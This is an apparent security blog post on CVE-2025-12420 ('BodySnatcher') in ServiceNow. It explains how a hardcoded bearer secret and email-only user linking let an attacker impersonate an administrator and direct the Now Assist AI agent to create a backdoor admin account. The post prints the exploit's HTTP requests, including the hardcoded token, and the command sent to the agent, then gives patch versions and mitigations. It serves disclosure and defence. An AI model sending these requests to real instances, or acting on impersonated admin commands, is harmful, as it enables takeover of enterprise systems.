Imagine waking up to find a new "backdoor" admin account in your ServiceNow instance. No passwords were leaked, no MFA was bypassed, and no SSO was compromised. Instead, an attacker simply "asked" your AI agent to create it.
This isn't a hypothetical scenario. It’s the reality of CVE-2025-12420, a critical privilege escalation vulnerability nicknamed BodySnatcher.
In this post, we’ll break down how a classic security blunder, a hardcoded secret, combined with the power of AI agents to create a "perfect storm" for enterprise compromise.
The Vulnerability: A Two-Step Identity Crisis
The flaw lives in the interaction between the Virtual Agent API (sn_va_as_service) and Now Assist AI Agents (sn_aia).
The Virtual Agent API is the gateway for external platforms like Slack or Teams to talk to ServiceNow. To keep things secure, it performs two checks:
- Provider Auth: Is the external platform authorized?
- User Linking: Which ServiceNow user is sending the message?
Here is where things went wrong.
1. The Hardcoded "Master Key"
For provider authentication, ServiceNow used a method called Message Auth. The problem? The secret key was hardcoded to servicenowexternalagent across every customer environment.
If you knew that string, you could authenticate as a legitimate external provider on any vulnerable ServiceNow instance.
2. The Email-Only Identity Check
Once "authenticated" as a provider, the system needed to link the session to a user. It used a feature called Auto-Linking, which matched users based solely on their email address.
By combining these two flaws, an attacker could authenticate with the hardcoded secret and then claim to be admin@yourcompany.com. The system would believe them without asking for a password or MFA.
Anatomy of the "BodySnatcher" Exploit
The exploit follows a simple but deadly three-step chain.
Step 1: Bypass API Auth
The attacker sends a POST request to the Virtual Agent endpoint using the hardcoded bearer token.
POST /api/sn_va_as_service/v1/virtualagent/message
Host: [your-instance].service-now.com
Authorization: Bearer servicenowexternalagent
Content-Type: application/json
{
"user_id": "attacker@evil.com",
"message": "Hello!"
}
Step 2: Hijack the Admin Identity
The attacker swaps their ID for a target admin's email.
{
"user_id": "admin.target@enterprise.com",
"message": "Start a privileged workflow."
}
ServiceNow now treats this session as the administrator.
Step 3: Weaponize the AI Agent
Now the "Agentic Amplification" kicks in. The attacker sends a natural language command to the Record Management AI Agent.
- Attacker: "I need to create a new user."
- Agent: (Triggers the privileged workflow)
- Agent Action: "Creating user 'backdoor' with 'admin' role..."
Because the agent executes actions in the context of the (hijacked) admin, it succeeds. The attacker now has a persistent backdoor.
Why This Matters: Agentic Amplification
BodySnatcher is a watershed moment for Agentic Security. In a traditional app, an auth bypass might let you see a dashboard. In an agentic system, the agent acts as a high-speed execution engine.
The agent’s ability to map natural language to high-privilege API calls drastically shortens the attack path. This is the Agentic Blast Radius: a single conversational command can now compromise entire enterprise systems.
How to Protect Your Instance
If you haven't already, patch immediately.
| Component | Affected Versions | Fixed Versions |
|---|---|---|
| Now Assist AI Agents | 5.0.24 – 5.1.17, 5.2.0 – 5.2.18 | 5.1.18, 5.2.19 |
| Virtual Agent API | <= 3.15.1, 4.0.0 – 4.0.3 | 3.15.2, 4.0.4 |
Beyond the Patch: Best Practices
Kill Hardcoded Secrets: Never use static credentials for API integrations. Use OAuth 2.0 or secure vaults.
Identity is Not an Email: An email address is a public identifier, not a credential. Enforce MFA/SSO at the point of identity linking.
Principle of Least Privilege (PoLP): Narrowly scope what your agents can do. If an agent only needs to file tickets, it shouldn't have the power to create admin users.
Implement AI Guardrails: Use specialized security layers like NeuralTrust to monitor agent behavior in real-time and block anomalous administrative actions.
Final Reflections
The BodySnatcher vulnerability proves that the most dangerous flaws today aren't just in the AI itself, but in how we connect AI to our existing (and sometimes broken) infrastructure.
As we move toward an autonomous enterprise, we must treat every tool exposed to an AI agent as a high-risk endpoint.
Have you audited your AI agent permissions lately? Let’s discuss in the comments
Top comments (0)